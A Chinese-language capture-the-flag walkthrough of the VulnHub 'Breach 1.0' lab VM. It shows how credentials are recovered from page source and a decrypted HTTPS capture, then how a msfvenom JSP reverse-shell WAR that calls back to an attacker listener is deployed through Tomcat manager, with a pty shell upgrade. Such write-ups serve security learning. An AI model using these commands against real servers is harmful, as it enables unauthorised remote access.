VulnHub***測試靶場Breach 1.0

一、瀏覽器訪問192.168.110.140在這裏插入圖片描述

二、點擊圖片,進入後臺
在這裏插入圖片描述
三、點擊Employee portal進入登錄後臺
在這裏插入圖片描述

四、發現需要登錄密碼,接下來就是獲得密碼
在這裏插入圖片描述
按F12打開開發者模式,發現旁註裏有解密後的用戶和密碼,用base64解碼,得到用戶和密碼
在這裏插入圖片描述
五、登錄進去之後,我們開始進行信息收集,我們發現了兩條有用的信息

在這裏插入圖片描述

在這裏插入圖片描述

通過這個網址,我們下載下來了一個證書,生成的密鑰文件 因爲他是一個瀏覽器的認證所以解不開
在這裏插入圖片描述

在這裏插入圖片描述

通過這個網址我們得到了一個pcap流量包,截取***的流量包 我是在百度開始搜索nginx生成ssl證書 下面會介紹

六、我們來分析該流量,我們將流量包放在wireshark上,發現因爲是https協議,所以都是密文的,我們無法得到什麼信息

在這裏插入圖片描述

在這裏插入圖片描述

七、所以我們得想辦法將其變成明文的,方便我們收集信息,這就是我們接下來的任務,我們首先知道剛纔下載了一個keystore的證書,我們試着將這個證書導到wireshark中,看看可不可以,嘗試過後發現不可以,流量還是密文的,後來我們知道應該講證書轉化成p12格式纔可以被解析,那接下來我們來操作這步

首先我們把keystore傳到moba上,然後在kali上敲

keytool -importkeystore  -srckeystore /root/keystore -destkeystore /root/nima.p12 -deststoretype PKCS12  -srcalias tomcat

在這裏插入圖片描述

得到了一個nima.p12的證書,接下來我們將這個證書導到wireshark上

在這裏插入圖片描述

在這裏插入圖片描述

在這裏插入圖片描述

8443可能是https協議所以設值爲他

(這一步得打個註釋:我這裏選的是TLS,因爲是老版,新版的話直接選SSL就可以了) 解完包會變成http格式

在這裏插入圖片描述

在這裏插入圖片描述

(這裏也得強調一下,這裏這個IP地址寫的不是目的地址,而是自己的主機IP,協議要寫http,而不是https)

八、最後點擊ok就導入完成了,這時我們發現流量多了http的流量,我們去追它http流,發現是明文的了,401代表登陸失敗 可以判斷出穿的***

在這裏插入圖片描述

九、那我們現在可以開始收集信息了,我們在上面看到401,需要登錄,往下翻發現有200狀態碼,說明登錄成功了,那我們往上看,肯定有賬號密碼,然後我們發現了被加密過了的賬號和密碼,我們將其複製去解碼器中解碼,得到了賬號和密碼 tomcat:Tt\5D8F(#!*u=G)4m7zB

在這裏插入圖片描述

十、接下來我們去找這個需要登錄的tomcat的頁面,我們去分析它的流量找到了這個網址

在這裏插入圖片描述
發現從192.168.110.129到192.168.110.140的***流量包,其中有cmd命令馬執行了id命令,***者上傳了兩張圖片,疑似圖片馬,但是命令馬無法直接訪問,需要登錄tomcat後臺:
在這裏插入圖片描述

十一、接下來我們去瀏覽器訪問該網址,發現無法訪問,因爲我們沒有相應的證書,它有限制,我們新版的瀏覽器都不允許訪問
在這裏插入圖片描述

但我們知道burp上也有各種證書,所以我們掛上代理,用burp代理放包,達到訪問的目的
在這裏插入圖片描述

放包之後發現出現了登錄框,我們輸入上面得到的賬號和密碼

在這裏插入圖片描述

放包,發現了tomcat的頁面

在這裏插入圖片描述

我們向上面傳***,用msf生成***

msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.110.189 lport=8989 -f war -o shandian.war

在這裏插入圖片描述

爲了不用一次次的放包,我們現在直接設置成不攔截

在這裏插入圖片描述

然後訪問***,這邊kali上監聽
在這裏插入圖片描述

在這裏插入圖片描述

最後得到權限

我們可以使用 python -c 'import pty;pty.spawn("/bin/bash")' 使其有bash模式
還可以使用 id 看我們當前的權限 爲tomcat6(普通用戶權限)

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章